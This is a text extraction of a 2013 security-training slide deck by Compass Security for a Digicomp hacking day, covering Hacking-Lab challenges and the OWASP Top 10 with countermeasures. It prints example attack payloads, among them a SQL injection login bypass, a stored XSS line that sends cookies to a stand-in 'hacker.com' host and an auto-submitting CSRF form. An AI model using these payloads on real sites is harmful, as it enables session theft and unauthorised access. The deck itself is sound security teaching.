hacking challenges
DESCRIPTION
Labs bei der Digicomp, Penetration Testing und Web Hacking Challenges von Ivan BütlerTRANSCRIPT
Ethical Hacking
Tel +41 55 214 41 60Fax +41 55 214 41 [email protected] www.csnc.ch
Compass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
Digicomp Hacking Day 2013
by Ivan Bütler, CEO Compass Security AG, Alias E1
Wir sind „Hacker“
© Compass Security AG Slide 2www.csnc.ch
Rapperswil – Berlin - Bern
© Compass Security AG Slide 3www.csnc.ch
Was machen wir so den ganzen Tag?
© Compass Security AG Slide 4www.csnc.ch
Warum sind Sie heute hier?
Was bringt die Zukunft?
Sie sind ein Nerd?
Illegale Sachen sind reizvoll?
Sie wollen geistig gefordert werden?
© Compass Security AG Slide 5www.csnc.ch
Sie wollen die Welt ein Stück besser machen?
Sie planen eine Karriere bei der Cyber Mafia?
Sie planen eine Karriere als Swiss Cyber Spezialist?
Wegen dem guten Essen?
Übersicht „Security Testing“
Treiber für
Firma Lieferant
© Compass Security AG Slide 6www.csnc.ch
Compliance Budget Sign-OffTreiber für
Security TestsAwareness
Information Security Management
Ergebnisse / Gefahren
Übersicht „Security Testing“
• manuell vs. automatisiert
• einmalig vs. regelmässig
• Blackbox vs. Whitebox
• mit und ohne Login
Methoden
© Compass Security AG Slide 7www.csnc.ch
• mit und ohne Login
• Hands-On vs. Review
• mit oder ohne Social Eng.
• mit oder ohne Source Code
• von aussen oder innen?
Übersicht „Security Testing“
Simulation von Angreifern – Intensität des Penetration Tests
© Compass Security AG Slide 8www.csnc.ch
Was braucht ein guter Tester?
Tel +41 55 214 41 60Fax +41 55 214 41 [email protected] www.csnc.ch
Compass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
Was ist ein guter Security Tester?
� Tüftler
� Wie funktioniert etwas?
� Warum funktioniert es?
� Auseinandernehmen
© Compass Security AG Slide 10www.csnc.ch
� Auseinandernehmen
� Zusammenbauen
� Töffli Frisierer!
ES BRAUCHT PRAXIS und ZEIT
Tel +41 55 214 41 60Fax +41 55 214 41 [email protected] www.csnc.ch
Compass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
Hacking-Lab Online Security Lab
© Compass Security AG Slide 12www.csnc.ch
Hacking-Lab Architecture
© Compass Security AG Slide 13www.csnc.ch
Working with Hacking-Lab
Challenge Details
© Compass Security AG Slide 14www.csnc.ch
Hands-On
Send Solution
Solution Grading
Hacking-Lab Roles
� Student 1. Choose the challenge(s)2. Solve the challenge3. Answer the questions (submit)4. Wait
© Compass Security AG Slide 15www.csnc.ch
� Teacher 1. Responsible for challenges2. Receiving your submissions3. Solution Grading
a) FULLY ACCEPTb) PARTIALL ACCEPTc) REJECT
Hacking-Lab Challenges & Categories
Web Security
Malware / Trojan / Bugs
Windows Security
Apple Security
VoiP / SS7 / GSM
Wireless Security
Unix / Linux Security
Crypto Challenges
© Compass Security AG Slide 16www.csnc.ch
Apple Security
Penetration Testing
Networking
Forensics
Reverse Engineering
Crypto Challenges
Programming
Fun Challenge
Challenges – SBS versus WG
Every challenge in Hacking-Lab is available as SBS or WG
SBSStep by Step
SBS challenges
are used in
commercial
WGWargame
WG challenges
are used in free
trainings, CTF
© Compass Security AG Slide 17www.csnc.ch
commercial
trainings.
Trainees do not
have the time to
spend 1-2 hours
per challenge.
They will be
guided through
the challenge.
trainings, CTF
and talent quest.
Solving a WG
challenge is more
difficult and
needs more
knowledge.
Challenges - SBS versus WG
WG Challenges� WG = Wargame
� The mission of the challenge is given, but without further details
� For the more advanced users
� Level 1 = 10 pointsLevel 1 = 10 pointsLevel 1 = 10 pointsLevel 1 = 10 points
� Level 2 = 20 pointsLevel 2 = 20 pointsLevel 2 = 20 pointsLevel 2 = 20 points
� Level 3 = 30 pointsLevel 3 = 30 pointsLevel 3 = 30 pointsLevel 3 = 30 points
© Compass Security AG Slide 18www.csnc.ch
SBS Challenges� SBS = Step by Step
� The mission of the challenge is given, including a step by step instruction
� For the beginners
� Level 1 = 5 points Level 1 = 5 points Level 1 = 5 points Level 1 = 5 points (50% of WG)
� Level 2 = 10 pointsLevel 2 = 10 pointsLevel 2 = 10 pointsLevel 2 = 10 points (50% of WG)
� Level 3 = 15 points Level 3 = 15 points Level 3 = 15 points Level 3 = 15 points (50% of WG)
Examples (Screenshots)
Tel +41 55 214 41 60Fax +41 55 214 41 [email protected] www.csnc.ch
Compass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
Running Events (Classrooms)
© Compass Security AG Slide 20www.csnc.ch
© Compass Security AG Slide 21www.csnc.ch
© Compass Security AG Slide 22www.csnc.ch
© Compass Security AG Slide 23www.csnc.ch
© Compass Security AG Slide 24www.csnc.ch
© Compass Security AG Slide 25www.csnc.ch
© Compass Security AG Slide 26www.csnc.ch
© Compass Security AG Slide 27www.csnc.ch
Ranking Page
© Compass Security AG Slide 28www.csnc.ch
Avatar System
© Compass Security AG Slide 29www.csnc.ch
Working from Remote?Using the HL LiveCD
Tel +41 55 214 41 60Fax +41 55 214 41 [email protected] www.csnc.ch
Compass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
VPN is required
Using the HL LiveCD
LiveCD Project (OpenVPN)
ESX for LiveCD DevLiveCD Vx.y
© Compass Security AG Slide 31www.csnc.ch
LiveCD Vx.z LiveCD Vx.z
VirtualBox OVA
LiveCD Vx.z
Vmware OVA
LiveCD SVN
Repository
Hacking-Lab LiveCD Project
© Compass Security AG Slide 32www.csnc.ch
Hacking-Lab LiveCD Project
© Compass Security AG Slide 33www.csnc.ch
Browser
1) Two profiles
2) Attacker
3) Victim
4) SwitchProxy
5) LiveHttpHeader
6) ... more
Hacking-Lab LiveCD Project
ZAP
Inspection
© Compass Security AG Slide 34www.csnc.ch
Inspection
Proxy
1) Web Analysis
2) Man in the Middle
3) Open Source
4) Java based
5) Loading = slow
Hacking-Lab LiveCD Project
© Compass Security AG Slide 35www.csnc.ch
HELP
1) Local webserver
2) Help
How to Access Microsoft VM (VDI)
© Compass Security AG Slide 36www.csnc.ch
ROOT
Shell
How to Access Microsoft VM (VDI)
© Compass Security AG Slide 37www.csnc.ch
User
Shell
Hacking-Lab LiveCD Project
© Compass Security AG Slide 38www.csnc.ch
VPN
How to Access Microsoft VM (VDI)
© Compass Security AG Slide 39www.csnc.ch
Vmware
View
VDI
How to Access Microsoft VM (VDI)
© Compass Security AG Slide 40www.csnc.ch
How to Access Microsoft VM (VDI)
User: hacker10, hacker11, hacker12 with password compass
© Compass Security AG Slide 41www.csnc.ch
How to Access Microsoft VM (VDI)
Choose VIEW pool (Hacking-Lab Clients)
© Compass Security AG Slide 42www.csnc.ch
5) How to Access Microsoft VM (VDI)
Enjoy the XP machine (connected with PCoIP)
© Compass Security AG Slide 43www.csnc.ch
https://www.hacking-lab.com/tutorial/
� LiveCD usage with VirtualBox Appliance
� LiveCD usage with Vmware8 workstation
© Compass Security AG Slide 44www.csnc.ch
� How to connect in HL with OpenVPN
� https://www.hacking-lab.com/FAQ/
© Compass Security AG Slide 45www.csnc.ch
Online Qualification im April / Mai 2013
Halb-Final 13. Juni 2013, KKL Luzern
Final in Linz / Wien, 5-7. November 2013
Wie funktioniert der Cyber Challenge?
© Compass Security AG Slide 46www.csnc.ch
© Compass Security AG Slide 47www.csnc.ch
Machen Sie mit!!
Swiss Cyber Storm Registrierung� https://www.hackinghttps://www.hackinghttps://www.hackinghttps://www.hacking----lab.com/sh/U8TA7c7lab.com/sh/U8TA7c7lab.com/sh/U8TA7c7lab.com/sh/U8TA7c7
Digicomp Hacking Day 2013 Web Security� http://bit.ly/10YcIMmhttp://bit.ly/10YcIMmhttp://bit.ly/10YcIMmhttp://bit.ly/10YcIMm
© Compass Security AG Slide 48www.csnc.ch
Digicomp Hacking Day 2013 Penetration Testing� http://bit.ly/18LK7lghttp://bit.ly/18LK7lghttp://bit.ly/18LK7lghttp://bit.ly/18LK7lg
Attack Vectors
Tel +41 55 214 41 60Fax +41 55 214 41 [email protected] www.csnc.ch
Compass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
What are the Hackers doing?
Direct Attacks
BLOCKED
© Compass Security AG Slide 50www.csnc.ch
PASSED
BLOCKED
Man in the Middle – e.g. Phishing
Indirect Attacks
© Compass Security AG Slide 51www.csnc.ch
Malware – Mobile Devices – W-LAN
Indirect Attacks
© Compass Security AG Slide 52www.csnc.ch
PASSED
Covert Channel
Indirect Attacks
Delivery via USB-Stick
© Compass Security AG Slide 53www.csnc.ch
InternetCompany Network
Start via Auto-Start
Attacker „observes“ the victim computer
Network Penetration Testing
Tel +41 55 214 41 60Fax +41 55 214 41 [email protected] www.csnc.ch
Compass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
Anatomy of a Hacker Attack
Footprinting Scanning
Think TimeWriting Break-in
Installation
DoS
© Compass Security AG Slide 55www.csnc.ch
Source: Anti-Hacker Book
Writing Exploits
Break-in
Privilege Escalation Steeling Data
Delete evident tracks
Backdoors
Penetration Testing
Information Gathering� Network Research
� War Googling
Scanning� Host and Service Discovery
� Vulnerability Scanning
© Compass Security AG Slide 56www.csnc.ch
Exploitation� Sniffing the Network
� Exploiting Vulnerabilities (VLAN, VoIP, Conficker, DNS Updates)
Backdoor Communication� Inside-Out
� Covert-Channels
Web Application SecurityOWASP Top 10
Tel +41 55 214 41 60Fax +41 55 214 41 [email protected] www.csnc.ch
Compass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
OWASP Top 10
Digicomp Hacking Day 2013
OWASP TOP 10
© Compass Security AG Slide 58www.csnc.ch
OWASP Top 10 (RC1 2010)
A1 SQL Injection
A2 Cross Site Scripting
A3 Broken Auth & Session Management
A4 Insecure Direct Object Reference
A5 Cross Site Request Forgery
© Compass Security AG Slide 59www.csnc.ch
A5 Cross Site Request Forgery
A6 Security Misconfiguration
A7 Failure to Restrict URL Access
A8 Unvalidated Redirects andForwards
A9 Insecure Cryptographic Storage
A10 Insufficient Transport LayerProtection
SQL Injection
Tel +41 55 214 41 60Fax +41 55 214 41 [email protected] www.csnc.ch
Compass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
A1: SQL Injection
Injection flaws occur when an application sends untrusteddata to an interpreter. Injection flaws are very prevalent, often found in SQL queries, LDAP queries,
© Compass Security AG Slide 61www.csnc.ch
LDAP queries, XPathqueries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing.
Introduction
Protocols
© Compass Security AG Slide 62www.csnc.ch
HTTPS
RMI
SQL
SQL Injection
User input is directly used to build SQL statements
Application Malicious
Hackerinjects SQL String
© Compass Security AG Slide 63www.csnc.ch
Modification of SQL query via browser
ApplicationQuery
select creditcard from Customers where user is ‘ibuetler’
Malicious
QueryOR 1=1;
SQL Injection
Protocols
© Compass Security AG Slide 64www.csnc.ch
RMI
HTTPS + SQL Hacker Code
SQL
Threat: Bypass Authentication
Assembling Strings to SQL Queries
public boolean auth(String user, String pass) {boolean isAuthenticated = false;
string sqlQueryString = "SELECT Username " +
"FROM Users WHERE Username = '" + user +
dynamic concatenation of SQL string and parameters
© Compass Security AG Slide 65www.csnc.ch
"' AND Password = '" + pass + "'";
int resultCount = perform(sqlQueryString)
if (resultCount > 0) {return true;
}
return false;}
Checks if at least one record exists. But the result must contain 0 or one result
Threat: Bypass Authentication
Attacker uses following input:� Login: meier
� Password: ' OR ''='
SELECT Username FROM UsersWHERE Username=' meier ' AND Password=' ' OR ''=' '
© Compass Security AG Slide 66www.csnc.ch
''=' '
WHERE clause evaluates to TRUE� All rows of table get select
� Result Set will not be empty!!!
User gets authenticated!
Countermeasures A1: SQL Injection
Tel +41 55 214 41 60Fax +41 55 214 41 [email protected] www.csnc.ch
Compass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
A1: SQL Injection
Secure Programming
Secure Programming� Java
�Use Prepared Statements
� ADO.NET
�Use Parameters Collection
� DB-Level
© Compass Security AG Slide 68www.csnc.ch
DB-Level
� Stored Procedures (do not use dynamic SQL in SP!)
Secure Programming (I) - Java
Java Prepared Statements� SQL statement gets precompiled at database
� Parameters are separate from the SQL statement
� Much faster when SQL statement is used several times
� Save against SQL injection attacks
© Compass Security AG Slide 69www.csnc.ch
PreparedStatement updateSales =
dbCon.prepareStatement("UPDATE COFFEES SET"
+ "SALES=? WHERE COF_NAME LIKE ?");
updateSales.setInt(1, 75); // correct
updateSales.setString(2, "Colombian"); // usage
updateSales.executeUpdate():
Insecure - Secure Programming (III)
But be aware. This Prepared Statement is still vulnerable to SQL injection!
//Prepares the statement on the database
PreparedStatement updateSales =
dbCon.prepareStatement(
© Compass Security AG Slide 70www.csnc.ch
"UPDATE COFFEES SET SALES=? WHERE COF_NAME "
+ "LIKE '" + name + "' "); // insecure usage
//Sets the parameters for the statementupdateSales.setString(1, req.getParameter("sale"));
//Executes the statementupdateSales.executeUpdate():
OWASP Top 10 (RC1 2010)
A1 SQL Injection
A2 Cross Site Scripting
A3 Broken Auth & Session Management
A4 Insecure Direct Object Reference
A5 Cross Site Request Forgery
© Compass Security AG Slide 71www.csnc.ch
A5 Cross Site Request Forgery
A6 Security Misconfiguration
A7 Failure to Restrict URL Access
A8 Unvalidated Redirects andForwards
A9 Insecure Cryptographic Storage
A10 Insufficient Transport LayerProtection
A2: Cross Site Scripting
XSS is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplieddata ina page sent to the browser without properly
© Compass Security AG Slide 72www.csnc.ch
browser without properly validating or escapingthat content.
Attack Vector
ProtocolJavaScript from www.abc.com isloaded to the client (Malware)
© Compass Security AG Slide 73www.csnc.ch
Attrackting!!
Authentication into Web Application
Session Hijacking (re-use client session)
Java Script from Malware Site (1)
E-BankMalware Site
Cookie between
E-Bank and Browser
© Compass Security AG Slide 74www.csnc.ch
Java Script from Malware Site
IS GENERALLY DENIED IS GENERALLY DENIED IS GENERALLY DENIED IS GENERALLY DENIED to
access the E-Bank cookie
because of the SAME ORIGIN
POLICY
Java Script from Malware Site (2)
E-BankMalware Site
Cookie between
E-Bank and Browser
<script src=http://Malware Site/m.js>
© Compass Security AG Slide 75www.csnc.ch
Java Script from Malware Site
IS ALLOWED IS ALLOWED IS ALLOWED IS ALLOWED to access the E-
Bank cookie, if the Script is
loaded from the E-Bank site
(Origin) with <script src=>
Cross-Site Scripting (XSS)
Tel +41 55 214 41 60Fax +41 55 214 41 [email protected] www.csnc.ch
Compass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
Session Stealing Sequence
Malicious JavaScript performs its own request
Hacker ClientWeb
Application
POST /document.jsp?id=898&value=<script>location.href="http://hacker.com/"+document.cookie</script>
Stores value
© Compass Security AG Slide 77www.csnc.ch
GET /app/document.jsp?id=898Cookie: session=123
Response:<script>location.href="http://hacker.com/"
+document.cookie</script>
GET /session=123
Stores valuein DB
Stores Requestin Log File
Reflected XSS
What is reflected XSS?� data provided by a web client is used immediately by server-side
code to generate a page of results for that user.
� Attacker has to send a crafted link to the victim.
� Typical example: search form
© Compass Security AG Slide 78www.csnc.ch
Attacker Victim Webserver
sends link:
http://example.com/search?<script>...</
script> GET /search?<script>...</script>
search results for:
<script>...</script>Script is
executed
Stored XSS
What is stored XSS?� data provided by a web client is stored in a database. This data is
then presented to the user unencoded.
� Malicious script is rendered more than once.
� XSS worms are based on stored XSS vulnerabilities.
� Typical example: message board
© Compass Security AG Slide 79www.csnc.ch
Recommendations
Tel +41 55 214 41 60Fax +41 55 214 41 [email protected] www.csnc.ch
Compass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
XSS Prevention
Possible solutions� Convert output into HTML entities
� < � <� > � >� " � "� ' � '
� Input validation on characters
© Compass Security AG Slide 81www.csnc.ch
� Input validation on characters�Do not accept "dangerous" characters (e.g. <)�Delete "dangerous" characters from request� Transform "dangerous" characters into HTML entities
� Input validation on strings / tags�Do not accept "dangerous" tags (e.g. <script>)�Delete "dangerous" tags from request� Transform "dangerous" tags into HTML entities
ESAPI
OWASP Enterprise Security API (ESAPI)
Available for all major programming languages� Java
� .NET (work in progress)
� PHP (work in progress)
� Coldfusion (work in progress)
© Compass Security AG Slide 82www.csnc.ch
� Coldfusion (work in progress)
� ...
Methods to prevent XSS� Encoder.encodeForHTML(maliciousString);
� Encoder.encodeForHTMLAttribute(maliciousString);
� Encoder.encodeForJavascript(maliciousString);
� Encoder.encodeForVBScript(maliciousString);
OWASP Top 10 (RC1 2010)
A1 SQL Injection
A2 Cross Site Scripting
A3 Broken Auth & Session Management
A4 Insecure Direct Object Reference
A5 Cross Site Request Forgery
© Compass Security AG Slide 83www.csnc.ch
A5 Cross Site Request Forgery
A6 Security Misconfiguration
A7 Failure to Restrict URL Access
A8 Unvalidated Redirects andForwards
A9 Insecure Cryptographic Storage
A10 Insufficient Transport LayerProtection
A3: Broken Authentication
Developers frequently build custom authentication and session schemes, but building these correctly is hard. As a result, they frequently have flaws, usually in areas such as
© Compass Security AG Slide 84www.csnc.ch
usually in areas such as logout, password management, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.
HTTP Authentication Mechanisms
© Compass Security AG Slide 85www.csnc.ch
Strong Authentication SMS
© Compass Security AG Slide 86www.csnc.ch
1) UN/PW
2) OTP
Client Certificate Auth
© Compass Security AG Slide 87www.csnc.ch
Authentication Strength
Factors of Authentication (3 variants)� To KNOWKNOWKNOWKNOW something
� Password, PIN
� To OWNOWNOWNOWN something
� Smartcard, SecurId, Safeword, Vasco, OTP
� To BEBEBEBE something
© Compass Security AG Slide 88www.csnc.ch
To BEBEBEBE something
� Fingerprint, Iris, Voice, Face
Definition of “Strong authentication”� Combination of at least 2 factors
Authentication in Web Applications
Browser Authentication� Based on Response Headers (HTTP ProtocolHTTP ProtocolHTTP ProtocolHTTP Protocol)
� BasicAuth
� DigestAuth
� NTML Auth
� Form-based Authentication (Application LoginApplication LoginApplication LoginApplication Login)
� POST: Submit Login Credentials in Post Body
© Compass Security AG Slide 89www.csnc.ch
� POST: Submit Login Credentials in Post Body
� GET: Submit Login Credentials in URL
� SSL based Authentication (HTTPS ProtocolHTTPS ProtocolHTTPS ProtocolHTTPS Protocol)
� Client Certificate
Authentication Schemes� Direct
� Challenge/Response
� Second Channel (SMS, Tokens)
Login Service Attacks
Tel +41 55 214 41 60Fax +41 55 214 41 [email protected] www.csnc.ch
Compass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
User Enumeration
Verbose login related error messages can lead to user enumeration� “Password incorrect”� “User unknown”
Login error messages must be neutral� “Username or Password incorrect”
© Compass Security AG Slide 91www.csnc.ch
� “Username or Password incorrect”
Critical dialogs� Login� Change password� Lost password
Session Handling Attacks
Tel +41 55 214 41 60Fax +41 55 214 41 [email protected] www.csnc.ch
Compass Security AGWerkstrasse 20Postfach 2038CH-8645 Jona
Session Fixation
Special form ofsession hijacking
Hacker tricks the victim to use a
Victim Hacker WebApp
/index.html
Session=123;
Please use session=123 for Webapp
/index.html; Session=123
© Compass Security AG Slide 93www.csnc.ch
victim to use asession knownto the hacker
In exampleURL basedsession trackingis used
LoginForm
doLogin(UserCredentials) + session=123;
Authenticate();Auth=Successfull!
/protected/index.html + session=123;
/protected/index.html + session=123;
OWASP Top 10 (RC1 2010)
A1 SQL Injection
A2 Cross Site Scripting
A3 Broken Auth & Session Management
A4 Insecure Direct Object Reference
A5 Cross Site Request Forgery
© Compass Security AG Slide 94www.csnc.ch
A5 Cross Site Request Forgery
A6 Security Misconfiguration
A7 Failure to Restrict URL Access
A8 Unvalidated Redirects andForwards
A9 Insecure Cryptographic Storage
A10 Insufficient Transport LayerProtection
A4: Insecure Direct Object References
1. For direct references to restricted resources, the application needs to verify the user is authorized to access the exact resource they have requested.
© Compass Security AG Slide 95www.csnc.ch
requested.
2. If the reference is an indirect reference, the mapping to the direct reference
Security by Obscurity
Insecure Admin Links
� Menu links as the only means of authorization
� Bypass with URL and parameter guessing possible
� Only partially implemented authorization
© Compass Security AG Slide 96www.csnc.ch
Only partially implemented authorization
� Function authorization only
Authorization “decentralized”
Single functions must call authorization checks
Functionor Data
Request Request
© Compass Security AG Slide 97www.csnc.ch
Threats� Call to the authorization module are easily forgotten
� Each function must be tested
Functionor Data
or Data
AuthorizationCheck
Authorization “centralized”
Authorization must be implemented� As centrally as possible
� As one module
Advantages� Less risk that implementationof authorization checks are
Authorization Check
Request
Request
© Compass Security AG Slide 98www.csnc.ch
of authorization checks areforgotten
� Easier to test
Disadvantages� Data authorization often difficult to achieve
Functionor Data
Functionor Data
OWASP Top 10 (RC1 2010)
A1 SQL Injection
A2 Cross Site Scripting
A3 Broken Auth & Session Management
A4 Insecure Direct Object Reference
A5 Cross Site Request Forgery
© Compass Security AG Slide 99www.csnc.ch
A5 Cross Site Request Forgery
A6 Security Misconfiguration
A7 Failure to Restrict URL Access
A8 Unvalidated Redirects andForwards
A9 Insecure Cryptographic Storage
A10 Insufficient Transport LayerProtection
A5: Cross Site Request Forgery
The easiest way to check whether an application is vulnerable is to see if each link and form contains an unpredictable token for each user. Without such an unpredictable token,
© Compass Security AG Slide 100www.csnc.ch
unpredictable token, attackers can forge malicious requests. Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets.
Introduction
Cross Site Request Forgery has many names� XSRF
� Session Riding
� One Click Attack
XSRF != XSS� XSS exploits the trust that a client has for the
© Compass Security AG Slide 101www.csnc.ch
� XSS exploits the trust that a client has for the website/application
� Client trusts the website:All the javascript code is necessary to run the webapplication
� XSRF exploits the trust that a website has for the user.
� Website trusts the client:All requests made by the user are intended to be made
Cross Site Request Forgery
E-BankMalware Site
Cookie between
E-Bank and Browser
© Compass Security AG Slide 102www.csnc.ch
Java Script from Malware Site
IS NOT ALLOWED IS NOT ALLOWED IS NOT ALLOWED IS NOT ALLOWED to access
the E-Bank cookie
Cross Site Request Forgery
E-BankMalware Site
Cookie between
E-Bank and Browser
<img src=http://bank/do_trade>
© Compass Security AG Slide 103www.csnc.ch
<img src=> loads image from
bank = this is allowed and
performs the malicous
transaction
XSRF with GET Method
Actions can be made by calling GET Requests (e.g. Order some items)
http://www.shop.com/controller? action=buy&productId=1&quantity=23
© Compass Security AG Slide 104www.csnc.ch
XSRF with POST Method
Actions can be made by calling POST Requests (e.g. Order some items)
© Compass Security AG Slide 105www.csnc.ch
POST /controller
Host: www.shop.com
.....
action=buy&productId=1&quantity=23
Malicious Hacker „POST“ Form
Prepared Website from Hacker
<body>
<form action="http://www.shop.com/controller" method="POST" >
<input type="hidden" name=" action " value=" buy "/>
<input type="hidden" name=" productId " value=" 1"/>
© Compass Security AG Slide 106www.csnc.ch
<input type="hidden" name=" productId " value=" 1"/>
<input type="hidden" name=" quantity " value=" 23"/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
Assumptions
The attacker knows the target website� How do the requests look like?
The victim has a valid session cookie � If session handling is done in the URL, the website is not vulnerable to this kind of attack.
© Compass Security AG Slide 107www.csnc.ch
Remediation
Form contains hidden field with random token.
Executing the request will send the hidden-field-token to the server.
Server now checks if the hidden-field-token is valid, if not: the request is cancelled
© Compass Security AG Slide 108www.csnc.ch
Only allowing POST Requests is no solution� Hidden form � Javascript: form.submit()
In other words:� Websites should embed fresh nonce in every form, check for it on every request
� Forged requests will have cookie, but not the nonce
Order after Remediation
Victim Webshop
Login
Cookie = 123
GET /order_form.htm
© Compass Security AG Slide 109www.csnc.ch
GET /controller?action=buy&token=uiwe4qi4&...
Cookie=123
Order successful
_
Cookie=123
order_form.htm
<input type=“hidden“ name=“token“ value=“uiwe4qi4“>
Generate random
token and embed
in form as hidden
field
Check token
Order after Remediation
© Compass Security AG Slide 110www.csnc.ch
OWASP Top 10 (RC1 2010)
A1 SQL Injection
A2 Cross Site Scripting
A3 Broken Auth & Session Management
A4 Insecure Direct Object Reference
A5 Cross Site Request Forgery
© Compass Security AG Slide 111www.csnc.ch
A5 Cross Site Request Forgery
A6 Security Misconfiguration
A7 Failure to Restrict URL Access
A8 Unvalidated Redirects andForwards
A9 Insecure Cryptographic Storage
A10 Insufficient Transport LayerProtection
A6: Security Misconfiguration
Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Developers and
© Compass Security AG Slide 112www.csnc.ch
code. Developers and network administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts, unnecessary services, etc.
Examples of Misconfigurations
� Do you have a process for keeping current on the latest versions and patches to all the software in your environment? This includes the OS, Web/App Server, DBMS, applications, and any libraries.
� Is everything unnecessary disabled, removed, or not installed (e.g., ports, services, pages, accounts)?
© Compass Security AG Slide 113www.csnc.ch
(e.g., ports, services, pages, accounts)?
� Are default account passwords changed or disabled?
� Are all other security settings configured properly.
� Are all servers protected by Firewalls / Filters … etc. A concerted, repeatable process is required to develop and maintain a proper security configuration.
Examples of Misconfigurations
Examples of Glocken-Shop Misconfigurations
� XML Injection -> /etc/passwd & /etc/shadow
� Directory Browsing of glocken.hacking-lab.com/logs/
� Tomcat Service runs with „root“ privileges
© Compass Security AG Slide 114www.csnc.ch
� Tomcat Service runs with „root“ privileges
OWASP Top 10 (RC1 2010)
A1 SQL Injection
A2 Cross Site Scripting
A3 Broken Auth & Session Management
A4 Insecure Direct Object Reference
A5 Cross Site Request Forgery
© Compass Security AG Slide 115www.csnc.ch
A5 Cross Site Request Forgery
A6 Security Misconfiguration
A7 Failure to Restrict URL Access
A8 Unvalidated Redirects andForwards
A9 Insecure Cryptographic Storage
A10 Insufficient Transport LayerProtection
A7: Failure to restrict URL Access
Applications are not always protecting page requests properly. Sometimes, URL protection is managed via configuration, and the system is misconfigured. Sometimes, developers
© Compass Security AG Slide 116www.csnc.ch
Sometimes, developers must include the proper code checks, and they forget.
Detecting such flaws is easy. The hardest part is identifying which pages (URLs) exist to attack.
Introduction
Failure to restrict URL access� Privilege Escalation from anonymous to registered user
� Privilege Escalation from registered to admin user
Examples of URL‘s
© Compass Security AG Slide 117www.csnc.ch
Examples of URL‘s� http://example.com/app/getappInfo� http://example.com/app/admin_getappInfo
Exploit� If an authenticated, non-admin, user is allowed to access the
“admin_getappInfo”page, this is a flaw, and may lead the attacker to more improperly protected admin pages.
OWASP Top 10 (RC1 2010)
A1 SQL Injection
A2 Cross Site Scripting
A3 Broken Auth & Session Management
A4 Insecure Direct Object Reference
A5 Cross Site Request Forgery
© Compass Security AG Slide 118www.csnc.ch
A5 Cross Site Request Forgery
A6 Security Misconfiguration
A7 Failure to Restrict URL Access
A8 Unvalidated Redirects and Forwards
A9 Insecure Cryptographic Storage
A10 Insufficient Transport LayerProtection
Unvalidated Redirects and Forwards
Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control
© Compass Security AG Slide 119www.csnc.ch
allow access control bypass.
OWASP Top 10 (RC1 2010)
A1 SQL Injection
A2 Cross Site Scripting
A3 Broken Auth & Session Management
A4 Insecure Direct Object Reference
A5 Cross Site Request Forgery
© Compass Security AG Slide 120www.csnc.ch
A5 Cross Site Request Forgery
A6 Security Misconfiguration
A7 Failure to Restrict URL Access
A8 Unvalidated Redirects and Forwards
A9 Insecure Cryptographic Storage
A10 Insufficient Transport LayerProtection
Insecure Cryptographic Storage
The most common flaw in this area is simply not encrypting data that deserves encryption. When encryption is employed, unsafe key generation and storage,
© Compass Security AG Slide 121www.csnc.ch
generation and storage, not rotating keys, and weak algorithm usage is common. Use of weak and unsalted hashes to protect passwords is also common. External attackers have difficulty detecting such flaws due to limited access.
Hashed and Salted User Passwords
Do not store passwords in plain-text to the table!!
Example: table with user accounts & plaintext password pose a high security risk!
mysql> select username, password from users;+----------+----------+
© Compass Security AG Slide 122www.csnc.ch
+----------+----------+| username | password |+----------+----------+| hacker10 | compass || hacker11 | compass |...
If possible: One-way-hashed and salted passwords using hash algorithms like SHA-1 (Do not use MD5 anymore)
OWASP Top 10 (RC1 2010)
A1 SQL Injection
A2 Cross Site Scripting
A3 Broken Auth & Session Management
A4 Insecure Direct Object Reference
A5 Cross Site Request Forgery
© Compass Security AG Slide 123www.csnc.ch
A5 Cross Site Request Forgery
A6 Security Misconfiguration
A7 Failure to Restrict URL Access
A8 Unvalidated Redirects and Forwards
A9 Insecure Cryptographic Storage
A10 Insufficient Transport LayerProtection
Insufficient Transport Layer Protection
Applications frequently do not properly protect network traffic. Usually, they use SSL/TLS during authentication, but not elsewhere, exposing all transmitted data as well as
© Compass Security AG Slide 124www.csnc.ch
transmitted data as well as session IDs to interception. Applications sometimes use expired or improperly configured certificates as well.
Detecting such flaws is easy. Just observe the site’s network traffic.
Mitigation
Use SSL + TLS� Set-Cookie: A=B; secure; HttpOnly
Reverse Proxy� Entry Server
© Compass Security AG Slide 125www.csnc.ch
� Reverse Proxy
� Secure Gateway